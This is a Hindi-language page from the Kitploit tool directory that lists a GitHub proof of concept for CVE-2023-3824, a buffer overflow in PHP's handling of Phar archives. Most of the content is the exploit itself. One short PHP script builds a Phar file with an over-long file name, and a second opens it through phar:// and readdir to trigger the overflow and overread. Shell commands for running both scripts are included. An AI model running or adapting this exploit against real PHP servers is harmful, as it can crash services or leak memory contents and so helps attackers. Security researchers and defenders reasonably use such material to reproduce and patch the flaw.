Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-3824 — PHP Phar फ़ाइलों में बफर ओवरफ्लो के कारण उत्पन्न होने वाली कमजोरी, Phar आर्काइव के अंदर फ़ाइल नामों पर अपर्याप्त लंबाई जांच के कारण होती है। दुर्भावनापूर्ण अभिनेता लंबे फ़ाइल नामों वाली Phar फ़ाइलें बना सकते हैं, जिससे बफर ओवरफ्लो और दुर्भावनापूर्ण कोड का निष्पादन या डेटा लीक हो सकता है। इस कमजोरी का उपयोग कोड निष्पादन CVE-2023-3824 के लिए किया जा सकता है। | Kitploit
उपकरण/GitHubGitHub/jhonnybonny/cve-2023-3824
पेलोड जनरेशनभेद्यता विश्लेषणशोषणलर्निंग और शिक्षाबाइनरी शोषण
GitHubjhonnybonny/cve-2023-3824

CVE-2023-3824

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
32462 साल पहलेअभी तक समीक्षित नहीं

विवरण

PHP Phar फ़ाइलों में बफर ओवरफ्लो के कारण उत्पन्न होने वाली कमजोरी, Phar आर्काइव के अंदर फ़ाइल नामों पर अपर्याप्त लंबाई जांच के कारण होती है। दुर्भावनापूर्ण अभिनेता लंबे फ़ाइल नामों वाली Phar फ़ाइलें बना सकते हैं, जिससे बफर ओवरफ्लो और दुर्भावनापूर्ण कोड का निष्पादन या डेटा लीक हो सकता है। इस कमजोरी का उपयोग कोड निष्पादन CVE-2023-3824 के लिए किया जा सकता है।

साझा करें

PHP दुर्भावनापूर्ण Phar फ़ाइल PoC (CVE-2023-3824)

विवरण

यह प्रूफ ऑफ कॉन्सेप्ट (PoC) प्रदर्शित करता है कि PHP में एक दुर्भावनापूर्ण Phar फ़ाइल कैसे बनाएं और बफर ओवरफ्लो भेद्यता को कैसे ट्रिगर करें।

उपयोग

दुर्भावनापूर्ण Phar फ़ाइल बनाना

  1. एक नई PHP फ़ाइल बनाएं (जैसे, create_phar.php) और निम्नलिखित कोड जोड़ें:
root@kitploit:~
<?php
$phar = new Phar('malicious.phar');
$phar->startBuffering();
$phar->addFromString(str_repeat('A', PHP_MAXPATHLEN - 1).'B', 'This is the content of the file.');
$phar->stopBuffering();
?>

दुर्भावनापूर्ण Phar फ़ाइल बनाने के लिए PHP स्क्रिप्ट निष्पादित करें: कोड कॉपी करें

root@kitploit:~
php create_phar.php

बफर ओवरफ्लो को ट्रिगर करना एक और PHP फ़ाइल बनाएं (जैसे, trigger_overflow.php) और निम्नलिखित कोड जोड़ें:

root@kitploit:~
<?php
$handle = opendir("phar://./malicious.phar");
$x = readdir($handle);
closedir($handle);

var_dump($x);
?>

बफर ओवरफ्लो को ट्रिगर करने के लिए PHP स्क्रिप्ट निष्पादित करें: कोड कॉपी करें php trigger_overflow.php var_dump($x) स्टेटमेंट बफर ओवरफ्लो और ओवररीड ऑपरेशन का परिणाम आउटपुट करेगा।

टूल डाउनलोड करें